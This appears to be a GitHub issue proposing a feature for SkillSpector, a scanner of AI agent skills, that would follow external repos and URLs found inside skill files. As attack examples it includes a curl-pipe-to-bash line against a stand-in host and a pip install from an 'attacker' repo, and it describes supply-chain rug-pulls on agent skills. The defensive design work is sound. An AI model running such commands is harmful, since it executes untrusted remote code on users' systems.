Skip to content

feat: transitive link scanning — follow external repos/URLs referenced inside skill files #97

@AbhiramDwivedi

Description

@AbhiramDwivedi

Problem

SkillSpector currently resolves the top-level input once (resolve_input.py) and then scans only those local files. Any URLs or repository references found inside the scanned files are never followed — analysis stops at the boundary of the input skill.

This creates a blind spot for a realistic attack pattern: a skill that appears clean on its own but delegates execution to an external source at runtime.

Example vectors:

  • A shell script in the skill bundle that does curl https://external-host/setup.sh | bash — the URL is detected as a pattern, but if setup.sh itself contains the malicious payload, it is never scanned.
  • A SKILL.md that references a companion repo (pip install git+https://github.com/attacker/lib) — the companion repo's code is never analyzed.
  • A skill that looks benign today but links to a repo the attacker controls and can update later (rug-pull via a dependency, not the skill itself).

The OSV.dev queries (osv_client.py) partially address this for named packages, but not for arbitrary Git URLs or raw script fetches.

Proposed feature

Add transitive link scanning as an optional pass after the primary scan:

  1. Extract candidate URLs from the scan results — collect all external URLs surfaced by existing analyzers (supply-chain, data-exfiltration, taint-tracking findings already contain them) plus a lightweight pass over file_cache for https?:// references in Markdown links, curl/wget args, pip install git+, npm install, etc.

  2. Filter to scannable targets — only follow links that point to something SkillSpector already knows how to resolve: Git repo URLs, .zip archives, raw .md/.sh/.py file URLs. Skip documentation, issue trackers, badges, etc.

  3. Recursive resolve_input with a visited set — clone/fetch each candidate into a temp dir, run the full analyzer graph on it, and merge findings back into the parent report with a transitive_depth field on each finding so the output clearly distinguishes direct vs. transitive results.

  4. Depth + domain allow/deny list controls — cap recursion depth (e.g. --transitive-depth 1 default, --transitive-depth 2 opt-in) and let users configure trusted domains to skip (e.g. github.com/myorg/*).

  5. CLI flag — opt-in via --transitive (off by default to preserve current behavior and scan time).

Why it fits the existing architecture

  • resolve_input.py already handles Git URLs, zips, raw file URLs, and directories — transitive scanning reuses that exact logic.
  • The analyzer registry is already a pure fan-out; running it on a second skill path requires no graph changes.
  • Findings from transitive targets can be added to the same findings list with a source_url / transitive_depth annotation, so meta_analyzer and report nodes are unaffected.

Acceptance criteria

  • skillspector scan <skill> --transitive clones/fetches external repo/file links found in the skill and runs the full analyzer suite on each
  • Findings from transitive targets are clearly labeled in all output formats (JSON, SARIF ruleId prefix or properties, Markdown section)
  • A visited-URL set prevents infinite loops / circular references
  • Default behavior (no --transitive) is unchanged
  • Unit tests cover URL extraction, the visited-set loop guard, and depth capping

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions